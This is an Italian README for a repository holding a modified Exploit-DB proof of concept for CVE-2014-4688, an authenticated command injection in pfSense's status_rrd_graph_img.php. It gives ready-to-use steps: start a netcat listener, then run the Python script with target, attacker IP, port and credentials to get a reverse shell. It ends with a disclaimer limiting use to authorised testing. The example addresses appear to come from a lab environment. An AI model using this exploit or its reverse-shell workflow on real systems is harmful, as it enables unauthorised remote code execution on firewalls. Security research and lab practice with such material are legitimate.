
Exploit proof-of-concept modificato per CVE-2014-4688, una vulnerabilità di command injection in pfSense status_rrd_graph_img.php, che consente l'esecuzione remota di codice autenticata con gestione SSL.
Prova di concetto modificata di Exploit-DB per CVE-2014-4688 (iniezione di comandi in pfSense status_rrd_graph_img.php)
Questo repository contiene una versione modificata della prova di concetto originale di Exploit-DB per CVE-2014-4688, che interessa le versioni di pfSense ≤ 2.1.3.
La vulnerabilità è presente nel componente status_rrd_graph_img.php e consente agli utenti autenticati di eseguire comandi di sistema arbitrari a causa di una sanificazione impropria dell'input del parametro database.
status_rrd_graph_img.phpUn utente autenticato può iniettare comandi shell arbitrari tramite input appositamente predisposti inviati all'endpoint vulnerabile.
Avvia un listener:
nc -lvnp <LPORT>
Prova di concetto:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
Questo repository è fornito esclusivamente per ricerca sulla sicurezza autorizzata, istruzione e test controllati. L'utilizzo non autorizzato contro sistemi senza esplicito permesso è illegale e non etico.